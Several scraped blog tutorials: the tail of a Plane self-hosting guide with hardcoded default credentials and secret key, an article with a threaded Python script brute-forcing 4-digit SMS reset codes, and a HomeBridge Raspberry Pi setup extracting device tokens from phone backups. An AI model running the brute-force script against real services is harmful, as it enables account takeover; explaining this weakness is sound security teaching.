+CORS_ALLOWED_ORIGINS=http://plane.zhgchg.li
+
+#DB SETTINGS
+PGHOST=plane-db
+PGDATABASE=plane
+POSTGRES_USER=plane
+POSTGRES_PASSWORD=plane
+POSTGRES_DB=plane
+POSTGRES_PORT=5432
+PGDATA=/var/lib/postgresql/data
+DATABASE_URL=
+
+# REDIS SETTINGS
+REDIS_HOST=plane-redis
+REDIS_PORT=6379
+REDIS_URL=
+
+# Secret Key
+SECRET_KEY=60gp0byfz2dvffa45cxl20p1scy9xbpf6d8c5y0geejgkyp1b5
+
+# DATA STORE SETTINGS
+USE_MINIO=1
+AWS_REGION=
+AWS_ACCESS_KEY_ID=access-key
+AWS_SECRET_ACCESS_KEY=secret-key
+AWS_S3_ENDPOINT_URL=http://plane-minio:9000
+AWS_S3_BUCKET_NAME=uploads
+MINIO_ROOT_USER=access-key
+MINIO_ROOT_PASSWORD=secret-key
+BUCKET_NAME=uploads
+FILE_SIZE_LIMIT=5242880
+
+# Gunicorn Workers
+GUNICORN_WORKERS=1
+
+# UNCOMMENT `DOCKER_PLATFORM` IF YOU ARE ON `ARM64` AND DOCKER IMAGE IS NOT AVAILABLE FOR RESPECTIVE `APP_RELEASE`
+# DOCKER_PLATFORM=linux/amd64
+
plane.zhgchg.li
as an example8081
to free up the original 80
for the reverse proxy NginxwebServices/
Create a docker-compose.yml
file to place Nginx:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+
version: '3.8'
+
+services:
+ webServices-nginx:
+ image: nginx
+ restart: unless-stopped
+ volumes:
+ - ./nginx/conf.d/plane.zhgchg.li.conf:/etc/nginx/conf.d/plane.zhgchg.li.conf
+
+ ports:
+ - 80:80
+ - 443:443
+
+ networks:
+ - plane-app_default # Network used by plane
+networks:
+ plane-app_default:
+ external: true
+
webServices/
Create a /conf.d
directory & plane.zhgchg.li.conf
file:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+
# For plane.zhgchg.li
+
+# http example:
+server {
+ listen 80;
+ server_name plane.zhgchg.li;
+
+ client_max_body_size 0;
+
+ location / {
+ proxy_pass http://plane-app-proxy-1; # plane proxy-1 service name
+ proxy_set_header Host $host;
+ proxy_set_header X-Real-IP $remote_addr;
+ proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
+ proxy_set_header X-Forwarded-Proto $scheme;
+ }
+}
+
+
+# https & http example:
+# server {
+# listen 443 ssl;
+# server_name plane.zhgchg.li;
+
+# #ssl
+# ssl_certificate /etc/nginx/conf/ssl/zhgchgli.crt; # Replace with your domain's crt & remember to add the key to docker-compose.yml volumes and mount into Docker
+# ssl_certificate_key /etc/nginx/conf/ssl/zhgchgli.key; # Replace with your domain's key & remember to add the key to docker-compose.yml volumes and mount into Docker
+# ssl_prefer_server_ciphers on;
+# ssl_protocols TLSv1.1 TLSv1.2;
+# ssl_ciphers "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 EECDH+aRSA+RC4 EECDH EDH+aRSA RC4 !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS !RC4";
+# ssl_ecdh_curve secp384r1; # Requires nginx >= 1.1.0
+# ssl_session_timeout 10m;
+# ssl_session_cache shared:SSL:10m;
+# add_header Strict-Transport-Security "max-age=63072000; includeSubDomains; preload";
+
+# client_max_body_size 0;
+
+# location / {
+# proxy_pass http://plane-app-proxy-1; # plane proxy-1 service name
+# proxy_set_header Host $host;
+# proxy_set_header X-Real-IP $remote_addr;
+# proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
+# proxy_set_header X-Forwarded-Proto $scheme;
+# }
+# }
+
+# server {
+# listen 80;
+# server_name plane.zhgchg.li;
+# return 301 https://plane.zhgchg.li$request_uri;
+# }
+
Because there are multiple docker-compose.yml files that need to be started individually, followed by starting the Nginx reverse proxy, we can put all the startup scripts into a single Shell Script.
Create the /start.sh
file under webServices/
:
1
+2
+3
+4
+5
+6
+7
+8
+9
+
#!/bin/sh
+
+# Encapsulate the startup Script
+
+# Start Plane and other services first
+docker compose -f ./plane-selfhost/plane-app/docker-compose.yaml --env-file ./plane-selfhost/plane-app/.env up -d
+
+# Start Nginx last
+docker compose -f ./docker-compose.yml --env-file ./.env up -d
+
When creating the Script file for the first time, remember to: chmod +x ./start.sh
You can also create one to stop the services, create the /stop.sh
file under webServices/
:
1
+2
+3
+4
+5
+6
+7
+
#!/bin/sh
+
+# Encapsulate the stop Script
+
+docker compose -f ./plane-selfhost/plane-app/docker-compose.yaml --env-file ./plane-selfhost/plane-app/.env down
+
+docker compose -f ./docker-compose.yml --env-file ./.env down
+
When creating the Script file for the first time, remember to: chmod +x ./stop.sh
./start.sh
to start all services1
+
./start.sh
+
If hosted on an internal network, you need to ask the IT department to add a DNS record for plane.zhgchg.li -> server IP address in the internal DNS.
1
+
plane.zhgchg.li server IP address
+
If you are testing on your local computer, you can add the following to the /private/etc/hosts file:
1
+
127.0.0.1 plane.zhgchg.li
+
http://plane-app-proxy-1
is correct and if the Nginx docker-compose.yml network settings are correct.welcome to nginx!
appears, using the reverse proxy you will no longer be able to access Plane using the original IP:80 method, you need to use the URL.Since the Plane project is under development and is an open-source project, it is uncertain whether there are any serious system vulnerabilities, which could potentially become an entry point for intrusion. Therefore, it is not recommended to set up Plane.so Self-Hosted on a public network. It is better to add an extra layer of security verification (Tunnel or certificate or VPN) to access it; even if it is set up on an internal network, it is best to isolate it.
As a project under development, there are inevitably bugs, experience, and security issues. Please be patient with the Plane.so team. If you have any issues, feel free to report them below:
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Demonstrating the severity of brute force attacks using Python
Photo by Matt Artz
This article doesn’t contain much technical content in terms of information security. It was simply a sudden idea I had while using a certain platform’s website; I decided to test its security and discovered some issues.
When using the password recovery feature on websites or apps, there are generally two options. One is to enter your account or email, and then a link to a password reset page containing a token will be sent to your email. Clicking the link will open the page where you can reset your password. This part is generally secure unless, as mentioned in this previous article, there are design flaws.
The other method for password recovery is to enter the bound phone number (mostly used in app services), and then an SMS verification code will be sent to your phone. After entering the verification code, you can reset your password. For convenience, most services use purely numeric codes. Additionally, since iOS ≥ 11 introduced the Password AutoFill feature, the keyboard will automatically recognize and prompt the verification code when the phone receives it.
According to the official documentation, Apple has not provided specific rules for the format of automatically filled verification codes. However, I noticed that almost all services supporting auto-fill use purely numeric codes, suggesting that only numbers can be used, not a complex combination of numbers and letters.
Numeric passwords are susceptible to brute force attacks, especially 4-digit passwords. There are only 10,000 combinations from 0000 to 9999. Using multiple threads and machines, brute force attacks can be divided and executed.
Assuming a verification request takes 0.1 seconds to respond, 10,000 combinations = 10,000 requests
1
+
Time required to crack: ((10,000 * 0.1) / number of threads) seconds
+
Even without using threads, it would take just over 16 minutes to find the correct SMS verification code.
In addition to insufficient password length and complexity, other issues include the lack of a limit on verification attempts and excessively long validity periods.
Combining the above points, this security issue is common in app environments. Web services often add CAPTCHA verification after multiple failed attempts or require additional security questions when requesting a password reset, increasing the difficulty of sending verification requests. Additionally, if web service verification is not separated between the front and back ends, each verification request would require loading the entire webpage, extending the response time.
In app environments, the password reset process is often simplified for user convenience. Some apps even allow login through phone number verification alone. If the API lacks protection, it can lead to security vulnerabilities.
⚠️Warning⚠️ This article is only intended to demonstrate the severity of this security issue. Do not use this information for malicious purposes.
Everything starts with sniffing. For this part, you can refer to previous articles “ The app uses HTTPS, but data is still stolen. “ and “ Using Python+Google Cloud Platform+Line Bot to automate routine tasks “. For the principles, refer to the first article, and for practical implementation, it is recommended to use Proxyman as mentioned in the second article.
If it is a front-end and back-end separated website service, you can use Chrome -> Inspect -> Network -> See what request was sent after submitting the verification code.
Assuming the verification code request obtained is:
1
+
POST https://zhgchg.li/findPWD
+
Response:
1
+2
+3
+4
+
{
+ "status": false,
+ "msg": "Verification error"
+}
+
crack.py:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+
import random
+import requests
+import json
+import threading
+
+phone = "0911111111"
+found = False
+def crack(start, end):
+ global found
+ for code in range(start, end):
+ if found:
+ break
+
+ stringCode = str(code).zfill(4)
+ data = {
+ "phone" : phone,
+ "code": stringCode
+ }
+
+ headers = {}
+ try:
+ request = requests.post('https://zhgchg.li/findPWD', data = data, headers = headers)
+ result = json.loads(request.content)
+ if result["status"] == True:
+ print("Code is:" + stringCode)
+ found = True
+ break
+ else:
+ print("Code " + stringCode + " is wrong.")
+ except Exception as e:
+ print("Code "+ stringCode +" exception error (" + str(e) + ")")
+
+def main():
+ codeGroups = [
+ [0,1000],[1000,2000],[2000,3000],[3000,4000],[4000,5000],
+ [5000,6000],[6000,7000],[7000,8000],[8000,9000],[9000,10000]
+ ]
+ for codeGroup in codeGroups:
+ t = threading.Thread(target = crack, args = (codeGroup[0],codeGroup[1],))
+ t.start()
+
+main()
+
After running the script, we get:
1
+
Verification code is: 1743
+
Enter 1743
to reset the password or directly log in to the account.
Bigo!
If you have any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Demonstrating the use of Raspberry Pi as a HomeBridge host to connect all Mi Home appliances to HomeKit
photo by picjumbo.com
Due to the pandemic, the time spent at home has increased; especially when working from home, it’s best if all home appliances can be smartly controlled via an app. This way, you don’t have to keep getting up to turn on the lights or the rice cooker, which wastes a lot of time.
Previously, I wrote an article titled “First Experience with Smart Home — Apple HomeKit & Xiaomi Mi Home”, where I initially tried using HomeBridge to connect Xiaomi appliances to HomeKit. Theoretically, it was feasible, but there wasn’t much practical application mentioned. Today’s article is a comprehensive advanced version of the previous one, including how to set up a Raspberry Pi as the host, with a step-by-step tutorial.
The motivation came from recently switching to an iPhone 11 Pro, which supports iOS ≥ 13 shortcuts with NFC automation. This means the phone can execute corresponding shortcuts when it detects an NFC tag. Although you can directly use an old EasyCard as an NFC tag, it takes up too much space and there aren’t that many cards. I asked around Guanghua Digital Plaza but couldn’t find any NFC tag stickers, so I finally found them on Shopee for $50 each and bought 5 to play with. The seller was kind enough to help me differentiate them by color.
*NFC automation is model-specific, only iPhone XS/XS max/XR/11/11pro/11pro max support this feature. Previously, with an iPhone 8, there was no NFC option.
After playing around a bit, I found a problem: when executing shortcuts for the Mi Home app, you must enable the “Show When Run” option (otherwise it won’t actually execute). When detecting the tag, you need to unlock the iPhone and the shortcut will open, making it impossible to execute directly in the background. Additionally, if the shortcut is for native Apple services (e.g., HomeKit appliances), it can execute directly in the background without unlocking. Moreover, HomeKit’s response speed and stability are much better than Mi Home’s.
This makes a big difference in user experience, so I delved deeper into connecting all Mi Home smart home products to HomeKit. For those that support HomeKit, just bind them directly; for those that don’t, follow this tutorial to bind them as well!
I made a simple reference diagram. If the smart appliance supports HomeKit, connect it directly. For those that don’t support HomeKit, set up a “HomeBridge” service host (which needs to be always on) to bridge and connect them. In the same network environment (e.g., the same WiFi), the iPhone can freely control all HomeKit appliances. However, if you’re on an external network, such as 4G mobile network, you need an Apple TV/HomePod or iPad as the home hub, always on standby at home to control HomeKit from outside. Without a home hub, the Home app will show “ No Response “ when opened from outside.
*If it’s a Xiaomi device, it will be controlled via the Xiaomi server, which means there could be security issues as the data has to go through mainland China.
So, there are two devices that need to be on standby all the time: one is an Apple TV/HomePod or iPad as the home hub; this part currently has no workaround, you have to obtain these devices somehow, if not, you can only use HomeKit at home .
The other device can be any computer that can be on standby 24 hours (like your iMac/MacBook), an idle host (old iMac, Mac Mini), or a Raspberry Pi.
*Windows series has not been tried, but it should work too!
Alternatively, if you just want to play around, you can use your current computer (can be used together with the previous article).
This article will demonstrate using a Raspberry Pi (Raspberry Pi 3B) and a MacBook Pro (MacOS 10.15.4), starting from setting up the Raspberry Pi environment from scratch; if you are not using a Raspberry Pi, you can skip directly to the HomeBridge integration with HomeKit part (this part is the same).
Raspberry Pi 3B (special thanks to Lu Xun Huang )
If you are using a Raspberry Pi, you will also need a micro SD card (not too big, I use 8G), a card reader, a network cable (for setup, can connect to WiFi later); and the software needed for the Raspberry Pi:
After downloading the two required software, first insert the memory card into the card reader and plug it into the computer; open the Etcher program (balenaEtcher).
First, select the Raspberry Pi OS you just downloaded “xxxx.img”, second, select your memory card device, then click “Flash!” to start burning!
At this point, it will prompt you to enter the MacOS password, enter it and click “Ok” to continue.
Burning… please wait…
Verifying… please wait…
Burn successful!
*If a red Error appears, try formatting the memory card and burning it again.
Reconnect the card reader to the computer, and create an empty “ssh” file in the memory card directory ( or click here to download ) with no content and no extension, just a “ssh” file; this allows us to connect to the Raspberry Pi using Terminal.
ssh
Eject the memory card, insert it into the Raspberry Pi, connect the network cable, and power it on; make sure the MacBook and Raspberry Pi are on the same network.
The IP address assigned to the Raspberry Pi is: 192.168.0.110 (Please replace all IP addresses in this document with the one you found)
It is recommended to set the Raspberry Pi to a static/reserved IP, otherwise the IP address may change after rebooting and reconnecting, requiring you to check it again.
Open Terminal and enter:
1
+
ssh pi@your_raspberry_pi_IP_address
+
When prompted, enter yes
, and for the password, enter the default password: raspberry
Connection successful!
*If you encounter an error message like WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED, open /Users/xxxx/.ssh/known_hosts with a text editor and clear its contents.
1
+
sudo apt-get install vim
+
2. Resolve the following locale warnings:
1
+2
+3
+4
+5
+6
+7
+8
+
perl: warning: Setting locale failed.
+perl: warning: Please check that your locale settings:
+ LANGUAGE = (unset),
+ LC_ALL = (unset),
+ LC_LANG = "zh_TW.UTF-8",
+ LANG = "zh_TW.UTF-8"
+ are supported and installed on your system.
+perl: warning: Falling back to the standard locale ("C").
+
Enter
1
+
vi .bashrc
+
Press “Enter” to proceed
Press “i
” to enter edit mode
Move to the bottom of the document and add a line “export LC_ALL=C
”
Press “Esc” and enter “:wq!
” to save and exit.
Then enter “source .bashrc
” to update.
3. Install nvm to manage nodejs/npm:
1
+
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.11/install.sh | bash
+
4. Use nvm to install the latest version of nodejs:
nvm install 12.16.2
*Here, we choose to install version “12.16.2”
5. Confirm the environment installation is complete:
Enter the following commands
npm -v
and
node -v
to confirm
No error messages!
6. Create a nodejs link
Enter the following command
1
+
which node
+
Get the path information where nodejs is located
Then enter
1
+
sudo ln -fs paste_the_path_you_found_with_which_node_here /usr/local/bin/node
+
Create the link
Setup complete!
Although we have installed the GUI version, you can directly connect the Raspberry Pi to a keyboard and HDMI to use it as a regular computer. However, for convenience, we will use the remote desktop method to control the Raspberry Pi.
Enter:
1
+
sudo raspi-config
+
Enter the settings:
Select the fifth option “ Interfacing Options “
Select the third option “ P3 VNC “
Use “ ← “ to select “ Yes “ to enable
VNC remote desktop feature enabled successfully!
Use “ → “ to directly switch to “ Finish “ to exit the setup interface.
We want the VNC remote desktop service to be automatically enabled when the Raspberry Pi boots up.
Enter
1
+
sudo vim /etc/init.d/vncserver
+
Press “Enter” to proceed
Press “ i
“ to enter edit mode
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+
#!/bin/sh
+### BEGIN INIT INFO
+# Provides: vncserver
+# Required-Start: $local_fs
+# Required-Stop: $local_fs
+# Default-Start: 2 3 4 5
+# Default-Stop: 0 1 6
+# Short-Description: Start/stop vncserver
+### END INIT INFO
+
+# More details see:
+# http://www.penguintutor.com/linux/vnc
+
+### Customize this entry
+# Set the USER variable to the name of the user to start vncserver under
+export USER='pi'
+### End customization required
+
+eval cd ~$USER
+
+case "$1" in
+ start)
+ su $USER -c '/usr/bin/vncserver -depth 16 -geometry 1024x768 :1'
+ echo "Starting VNC server for $USER "
+ ;;
+ stop)
+ su $USER -c '/usr/bin/vncserver -kill :1'
+ echo "vncserver stopped"
+ ;;
+ *)
+ echo "Usage: /etc/init.d/vncserver {start|stop}"
+ exit 1
+ ;;
+esac
+exit 0
+
“Command” + “C”, “Command” + “V” to copy and paste the above content, press “Esc” and enter “:wq!” to save and exit.
Then enter:
1
+
sudo chmod 755 /etc/init.d/vncserver
+
Change the file permissions.
Then enter:
1
+
sudo update-rc.d vncserver defaults
+
Add to startup items.
Finally enter:
1
+
sudo reboot
+
Restart the Raspberry Pi.
*After the restart is complete, reconnect using ssh as before.
Here we use the Chrome app “ VNC® Viewer for Google Chrome™ “. After installation and launch, enter Raspberry Pi IP address:1. Please note to add Port:1 at the end!
*I was unable to connect using Mac’s built-in VNC://, the reason is unknown.
Click “ Connect “.
Click “ OK “.
Enter login username and password , same as SSH connection, username pi
default password raspberry
.
Successfully connected!
The rest is graphical interface! Very easy!
Set language, region, time zone.
Change the default Raspberry Pi password, enter the password you want to set.
Directly click “ Next “.
Set up WiFi connection, so you don’t need to plug in the cable anymore.
*But please note that the Raspberry Pi IP address may change, you need to check it again in the router
Whether to update the current operating system, if not in a hurry, select “ Next “ to update!
*The update takes about 20~30 minutes (depending on your internet speed)
After the update is complete, click “ Restart “ to restart.
Raspberry Pi environment setup complete!
Now for the main event, installing and using HomeBridge.
Use Terminal to ssh into the Raspberry Pi or directly use the Terminal in the VNC remote desktop.
Enter:
1
+
npm -g install homebridge --unsafe-perm
+
^( Do not add sudo )
Install HomeBridge
Installation complete!
For easier editing, use VNC remote desktop to connect to the Raspberry Pi (you can also use commands directly) :
Click the top left to open “ File Manager “ -> go to “ /home/pi/.homebridge “
If you don’t see the “config.json” file, right-click on the blank area “ New File “ -> enter the file name “ config.json “
Right-click on “ config.json “ and open with “ Text Editor “
Paste the following basic configuration content:
1
+2
+3
+4
+5
+6
+7
+
{
+ "bridge": {
+ "name": "Homebridge",
+ "username": "CC:22:3D:E3:CE:30",
+ "port": 51826,
+ "pin": "123-45-568"
+}
+
No need to make special changes to the content, just copy it directly!
Remember to save!
Done!
Enter:
1
+
homebridge start
+
^( Do not add sudo )
Enable
If you encounter an Error: Service name is already in use on the network / port is occupied error, try deleting the service, using
homebridge restart
to restart, or rebooting.
If you encounter an error like was not registered by any plugin, it means you haven’t installed the corresponding homebridge plugin.
If you change the configuration file (config.json) while starting, you need to modify it:
sudo homebridge restart
Restart HomeBridge
Press “Control” + “C” to close and exit the HomeBridge service in Terminal.
Take out your iPhone and open the “Home” app. In the upper right corner of “Home,” click “+”, select “Add Accessory,” and scan the QRCode that appears.
At this point, you should see “ Accessory Not Found “. Don’t worry! Because we haven’t added any accessories to the HomeBridge bridge yet, it’s okay, let’s continue.
You must have at least one accessory to scan and add!!! (Here, we use a camera as an example) : You must have at least one accessory to scan and add!!! (Here, we use a camera as an example) : You must have at least one accessory to scan and add!!! (Here, we use a camera as an example) :
The first time you scan and add, a warning window will appear. Just click “Force Add”!
After adding once, you don’t need to scan again for any new accessories; they will update automatically!
Like the VNC remote desktop service, we also want the HomeBridge service to be automatically enabled when the Raspberry Pi starts, otherwise, we have to manually log in and enable it every time it reboots.
Enter:
1
+
which homebridge
+
Get homebridge path information
Note down this path.
Then enter:
1
+
sudo vim /etc/init.d/homebridge
+
Press “Enter” to enter
Press “i
” to enter edit mode
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+68
+69
+70
+71
+72
+73
+74
+75
+76
+77
+78
+79
+80
+81
+82
+83
+84
+85
+86
+87
+88
+89
+90
+91
+92
+93
+94
+95
+96
+97
+98
+
#!/bin/sh
+### BEGIN INIT INFO
+# Provides:
+# Required-Start: $remote_fs $syslog
+# Required-Stop: $remote_fs $syslog
+# Default-Start: 2 3 4 5
+# Default-Stop: 0 1 6
+# Short-Description: Start daemon at boot time
+# Description: Enable service provided by daemon.
+### END INIT INFO
+
+dir="/home/pi"
+cmd="DEBUG=* paste the path you got from which homebridge here"
+user="pi"
+
+name=`basename $0`
+pid_file="/var/run/$name.pid"
+stdout_log="/var/log/$name.log"
+stderr_log="/var/log/$name.err"
+
+get_pid() {
+cat "$pid_file"
+}
+
+is_running() {
+[ -f "$pid_file" ] && ps -p `get_pid` > /dev/null 2>&1
+}
+
+case "$1" in
+start)
+if is_running; then
+echo "Already started"
+else
+echo "Starting $name"
+cd "$dir"
+if [ -z "$user" ]; then
+sudo $cmd >> "$stdout_log" 2>> "$stderr_log" &
+else
+sudo -u "$user" $cmd >> "$stdout_log" 2>> "$stderr_log" &
+fi
+echo $! > "$pid_file"
+if ! is_running; then
+echo "Unable to start, see $stdout_log and $stderr_log"
+exit 1
+fi
+fi
+;;
+stop)
+if is_running; then
+echo -n "Stopping $name.."
+kill `get_pid`
+for i in 1 2 3 4 5 6 7 8 9 10
+# for i in `seq 10`
+do
+if ! is_running; then
+break
+fi
+
+echo -n "."
+sleep 1
+done
+echo
+
+if is_running; then
+echo "Not stopped; may still be shutting down or shutdown may have failed"
+exit 1
+else
+echo "Stopped"
+if [ -f "$pid_file" ]; then
+rm "$pid_file"
+fi
+fi
+else
+echo "Not running"
+fi
+;;
+restart)
+$0 stop
+if is_running; then
+echo "Unable to stop, will not attempt to start"
+exit 1
+fi
+$0 start
+;;
+status)
+if is_running; then
+echo "Running"
+else
+echo "Stopped"
+exit 1
+fi
+;;
+*)
+echo "Usage: $0 {start|stop|restart|status}"
+exit 1
+;;
+esac
+exit 0
+
Replace:
cmd=”DEBUG=* Paste which homebridge path”
with the path information you found (without double quotes)
Press “Command” + “C”, “Command” + “V” to copy and paste the above content, press “Esc” and enter “:wq!” to save and exit.
Then enter:
1
+
sudo chmod 755 /etc/init.d/homebridge
+
Modify file permissions.
Finally enter:
1
+
sudo update-rc.d homebridge defaults
+
Add to startup items.
Done!
You can directly use
sudo /etc/init.d/homebridge start
to start thehomebridge
service.
You can also use:
tail -f /var/log/homebridge.err
to view startup error messages,tail -f /var/log/homebridge.log
to view logs.
Once Homebridge is up and running, we can start adding all Mi Home appliances to Homebridge and connect them to HomeKit!
First, we need to add all Mi Home smart appliances to the Mi Home APP to obtain the information needed to connect to HomeBridge.
After adding the smart appliances to the Mi Home APP:
Connect your iPhone to your Mac, open Finder/iTunes, and select the connected phone.
Select “Back up to this computer”, “Do not check! Encrypt local backup”, and click “Back Up Now”.
After the backup is complete, download and install the backup viewer software: iBackupViewer
Open “iBackupViewer”.
The first time you start it, you will need to go to Mac “System Preferences” - “Security & Privacy” - “Privacy” - “+” - add “iBackupViewer”.
*If you have privacy concerns, you can disable the network while using this software and remove it after use.
Open “iBackupViewer” again, and after successfully reading the backup file, click on the “just backed up phone”.
Select the “App Store” Icon.
On the left, find “Mi Home APP (MiHome.app)” -> On the right, find “numbers_mihome.sqlite” file and “select” -> Top right “Export” -> “Selected Files”.
*If there are two “numbers_mihome.sqlite” files, choose the one with the latest Created time.
Drag the exported numbers_mihome.sqlite file into this website to view the content:
You can change the query syntax to:
1
+
SELECT `ZDID`,`ZNAME`,`ZTOKEN` FROM 'ZDEVICE' LIMIT 0,30
+
Only display the field information we need (if there are specific appliance kits that require other field information, you can also add them for filtering).
ZTOKEN cannot be used directly, it needs to be converted to “Token” to be usable.
Here, we take the conversion of the camera’s ZToken to Token as an example:
First, we obtain the ZToken field content of the camera from the above list:
1
+
7f1a3541f0433b3ccda94beb856c2f5ba2b15f293ce0cc398ea08b549f9c74050143db63ee66b0cdff9f69917680151e
+
But the TOKEN obtained here cannot be used yet, we still need to convert it.
Open http://aes.online-domain-tools.com/ this website:
「 6d304e6867384b704b4f714d45314a34 」is the Token result we need!
*The method of obtaining the Token has been tried using “miio” to sniff directly, but it seems that the Mijia firmware has been updated, and this method can no longer be used to quickly and conveniently obtain the Token!
Finally, we also need to know the IP address of the device (here we take the camera as an example):
Open the Mi Home APP → Camera → Top right corner “…” → Settings → Network Information, to get the IP address!
Record the ZDID/Token/IP information for later use.
Install and configure each device individually according to the required plugins and connection information, and add them to HomeBridge.
Next, open Terminal, ssh into the Raspberry Pi, or use VNC remote desktop’s Terminal to continue the subsequent operations…
In Terminal, run the command to install the MijiaCamera homebridge plugin (without sudo):
1
+
npm install -g homebridge-mijia-camera
+
Refer to the previous tutorial on modifying the configuration file (config.json), and add the accessories section in the file:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "accessories":[
+ {
+ "accessory":"MijiaCamera",
+ "name":"Mi Camera",
+ "ip":"",
+ "token":""
+ }
+ ]
+}
+
accessories:
Add the configuration information of the Mijia camera, with the ip field filled with the camera’s IP and the token field filled with the token taught in the previous tutorial.
Remember to save the file!
Then, follow the Homebridge section tutorial to start/restart/scan and add to Homebridge; you will be able to see the camera control items in the “Home” APP.
Controllable items: Camera on/off
In Terminal, install the homebridge-mi-fan homebridge plugin (without sudo):
1
+
npm install -g homebridge-mi-fan
+
Refer to the previous tutorial on modifying the configuration file (config.json), and add the platforms block in the file (if it already exists, add a sub-block within the block using a comma) :
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "platforms":[
+ {
+ "platform":"MiFanPlatform",
+ "deviceCfgs":[
+ {
+ "type":"MiDCVariableFrequencyFan",
+ "ip":"",
+ "token":"",
+ "fanName":"room fan",
+ "fanDisable":false,
+ "temperatureName":"room temperature",
+ "temperatureDisable":true,
+ "humidityName":"room humidity",
+ "humidityDisable":true,
+ "buzzerSwitchName":"fan buzzer switch",
+ "buzzerSwitchDisable":true,
+ "ledBulbName":"fan led switch",
+ "ledBulbDisable":true
+ }
+ ]
+ }
+ ]
+}
+
platforms:
Add Mi Home fan configuration information, input the camera’s IP in the ip field, input the token from the previous tutorial in the token field, and control whether to display temperature and humidity information with humidity/temperature. The type must be the corresponding model text, supporting four different fan models:
Please input your own fan model.
Remember to save the file!
Then, as taught in the Homebridge section, start/restart/scan to add to Homebridge; you will be able to see the camera control items in the “Home” APP.
Controllable items: Fan on/off, wind speed adjustment
In Terminal, install the homebridge-xiaomi-air-purifier3 homebridge plugin (without sudo):
1
+
npm install -g homebridge-xiaomi-air-purifier3
+
Refer to the previous tutorial on modifying the configuration file (config.json), and add the accessories block in the file (if it already exists, add a sub-block within the block using a comma) :
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "accessories":[
+ {
+ "accessory":"XiaomiAirPurifier3",
+ "name":"Xiaomi Air Purifier",
+ "did":"",
+ "ip":"",
+ "token":"",
+ "pm25_breakpoints":[
+ 5,
+ 12,
+ 35,
+ 55
+ ]
+ }
+ ]
+}
+
accessories:
Add Mi Home fan configuration information, ip should be the camera ip, token should be the token taught in the previous tutorial, did should be zdid
Remember to save!
Then follow the Homebridge section instructions to start/restart/scan and add to Homebridge; you will be able to see the camera control items in the “Home” APP.
Controllable items: Air purifier switch, wind speed adjustment Viewable items: Current temperature and humidity
In Terminal, install the homebridge-yeelight-wifi homebridge plugin (without sudo):
1
+
npm install -g homebridge-yeelight-wifi
+
Refer to the previous tutorial on modifying the configuration file (config.json), and add the platforms block in the file (if it already exists, add a sub-block with a comma inside the block) :
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+
{
+ "bridge":{
+ "name":"Homebridge",
+ "username":"CC:22:3D:E3:CE:30",
+ "port":51826,
+ "pin":"123-45-568"
+ },
+ "platforms":[
+ {
+ "platform":"yeelight",
+ "name":"Yeelight"
+ }
+ ]
+}
+
No need to pass any special parameters! For more detailed settings, refer to the official documentation (such as brightness/color temperature…)
Remember to save!
The smart desk lamp also needs to be re-bound to the Yeelight APP, and then turn on “Local Network Control” to allow Homebridge to control it.
Search “Yeelight” in the App Store and install
After installation, open the Yeelight APP -> “Add Device” -> Find “Mi Home Desk Lamp” -> Re-pair and bind
Remember to turn on “ Local Network Control “
*If you accidentally didn’t turn it on, you can go to the “Device” page -> Select the desk lamp device -> Click the bottom right “△” Tab -> Click “Local Network Control” to enter settings -> Turn on Local Network Control
A little complaint, this is really bad, the Mi Home APP itself does not have this switch function, you must bind it to the Yeelight APP, and you cannot unbind or rebind it back to Mi Home… otherwise it will fail.
Then follow the Homebridge section instructions to start/restart/scan and add to Homebridge; you will be able to see the camera control items in the “Home” APP.
Controllable items: Light switch, color temperature adjustment, brightness adjustment
My final config.json looks like this:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
